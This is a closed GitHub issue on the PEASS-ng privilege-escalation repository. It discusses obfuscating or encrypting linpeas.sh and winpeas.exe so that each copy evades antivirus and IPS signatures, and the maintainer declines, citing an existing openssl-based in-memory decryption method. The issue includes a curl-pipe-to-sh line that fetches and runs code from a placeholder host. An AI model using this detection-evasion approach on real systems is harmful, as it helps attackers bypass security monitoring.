Closed Kracken256 closed 1 year ago
You maybe mean to automate something like what is suggested in https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#av-bypass ?
openssl
is one of the most common binaries in hosts (you can find it even in distroless containers).
The thing is that if we host the obfuscated version in this github repo, the AV is capable of detecting the linpeas just because of the URL. And if you are going to host it in your own server, in that page you have a very easy way to encrypt it and then decrypt it in memory.
So I don't think it's worth it to maintain an obfuscated/encrypted version inside this repo.
Suggestions to auto obfuscate LinPeas.sh
Include a script to take the linpeas.sh binary (any version) that does this:
Create another script (pure bash or perl) that does the inverse. It should accept the 8-character key as a parameter. Also, the script should allow input from stdin. So it can be executed in a simple
curl host/linpeas.sh | curl decode_script.sh -p abcdef12 | sh
. Or something like that.This will ensure that every linpeas script used on the box will have a significantly different signature. If/When IPS gets updated for it, just change the encoding.
The decode script should be as small as possible.
I have already written Python scripts to do this. Bash scripts are not my fav.
The same concept should work for Windows winpeas.exe. Just write the decoded binary to disk and execute it.